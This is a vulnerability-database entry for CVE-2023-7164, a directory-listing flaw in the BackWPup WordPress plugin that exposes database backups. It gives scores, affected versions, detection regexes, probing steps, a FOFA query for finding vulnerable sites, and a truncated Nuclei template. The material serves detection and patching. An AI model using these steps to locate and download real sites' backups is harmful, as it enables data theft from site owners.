CVE-2023-7164
published 2024-04-08CVE-2023-7164: The BackWPup WordPress plugin before 4.0.4 does not prevent Directory Listing in its temporary backup folder, allowing unauthenticated attackers to download…
PriorityP356high7.5CVSS 3.1
AVNACLPRNUINSUCHINAN
EXPLOIT
EPSS
2.26%
80.8th percentile
The BackWPup WordPress plugin before 4.0.4 does not prevent Directory Listing in its temporary backup folder, allowing unauthenticated attackers to download backups of a site's database.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| inpsyde | backwpup | < 4.0.4 | 4.0.4 |
Detection & IOCsextracted from sources · hover to see the quote
yara↗
regex: backwpup-[a-f0-9]{6}-(backups|temp)yara↗
regex: [\w\-\.]+\.(tar\.gz|tar|zip|sql)
- →Probe for directory listing exposure at the BackWPup temporary/backup folder path matching pattern backwpup-[a-f0-9]{6}-(backups|temp) under /wp-content/uploads/. A 200 response containing 'Index of' and the folder pattern confirms vulnerability. ↗
- →After identifying the exposed backup folder, check for downloadable backup files matching extensions .tar.gz, .tar, .zip, or .sql — their presence with HTTP 200 confirms unauthenticated backup file disclosure. ↗
- →Use FOFA query 'body="/wp-content/plugins/backwpup/"' to identify internet-facing WordPress instances with the BackWPup plugin installed for targeted scanning. ↗
- →The exploit requires no authentication — any unauthenticated HTTP GET to the exposed backup folder path is sufficient to trigger the vulnerability. ↗
- ·The vulnerability only affects BackWPup plugin versions strictly below 4.0.4; instances running 4.0.4 or later are not affected. ↗
- ·The exposed path is specifically the plugin's temporary backup folder under wp-content/uploads/, not the entire uploads directory; detection should focus on the backwpup-[a-f0-9]{6}-(backups|temp) subdirectory pattern. ↗
- ·The Nuclei template uses stop-at-first-match across four common WordPress base path variants (/wp-content/uploads/, /blog/wp-content/uploads/, /wordpress/wp-content/uploads/, /wp/wp-content/uploads/); scanners should account for non-standard WordPress install paths that may be missed. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Nuclei
WordPress BackWPup < 4.0.4 - Backup File Disclosure
nuclei·CVSS 7.5
CVE-2023-7164 [HIGH] WordPress BackWPup < 4.0.4 - Backup File Disclosure
WordPress BackWPup < 4.0.4 - Backup File Disclosure
BackWPup WordPress plugin < 4.0.4 contains a directory listing vulnerability caused by lack of access restrictions in its temporary backup folder, letting unauthenticated attackers download site backups, exploit requires no authentication.
Template:
id: CVE-2023-7164
info:
name: WordPress BackWPup < 4.0.4 - Backup File Disclosure
author: 0x_Akoko
severity: high
description: |
BackWPup WordPress plugin < 4.0.4 contains a directory listing vulnerability caused by lack of access restrictions in its temporary backup folder, letting unauthenticated attackers download site backups, exploit requires no authentication.
impact: |
Unauthenticated attackers can download site backups, potentially leading to data theft or further exploitation.
rem
No writeups or analysis indexed.
2024-04-08
Published